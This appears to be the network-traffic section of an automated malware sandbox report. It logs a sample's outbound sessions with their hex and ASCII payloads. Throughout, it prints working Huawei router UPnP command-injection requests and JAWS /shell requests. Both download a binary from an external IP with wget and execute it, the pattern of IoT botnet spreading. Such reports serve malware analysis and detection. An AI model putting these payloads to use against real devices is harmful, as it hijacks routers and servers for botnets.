                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:02.311983109 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:05.927475929 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:13.094552994 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:27.428462029 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          403192.168.2.2355408129.21.35.14580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:59.028626919 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:59.189445019 CET392INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:59 GMT
                                                          Server: Apache
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          404192.168.2.2353220212.162.84.18780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:59.055809975 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:00.392272949 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:01.960042000 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:05.159595966 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:11.558669090 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:24.100929976 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          405192.168.2.233577847.95.228.7380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:59.105890036 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:59.415182114 CET338INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 02 Jan 2024 05:24:59 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          406192.168.2.234207845.11.236.14280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:59.115434885 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:59.345968008 CET430INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:59 GMT
                                                          Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          407192.168.2.2339204146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:59.145380020 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:58Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          408192.168.2.235054418.66.27.18280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:59.193136930 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:59.444467068 CET316INHTTP/1.1 403 Forbidden
                                                          Server: CloudFront
                                                          Date: Tue, 02 Jan 2024 05:24:59 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 151
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          409192.168.2.2340926145.236.36.12880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:59.212800026 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:59.492368937 CET525INData Raw: 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 20 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 2f 62 68
                                                          Data Ascii: 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1 404 Not FoundServer: mini_httpd/1.19/bhoc 23sep2004Date: Sat, 07 Feb 1970 10:05:37 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=UTF-8Connection: close<HTML><HEAD><T


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          410192.168.2.2339420212.8.247.7080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:59.257112980 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          411192.168.2.235656618.172.204.12480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:59.388501883 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:59.748073101 CET316INHTTP/1.1 403 Forbidden
                                                          Server: CloudFront
                                                          Date: Tue, 02 Jan 2024 05:24:59 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 151
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          412192.168.2.2339240146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:59.473805904 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
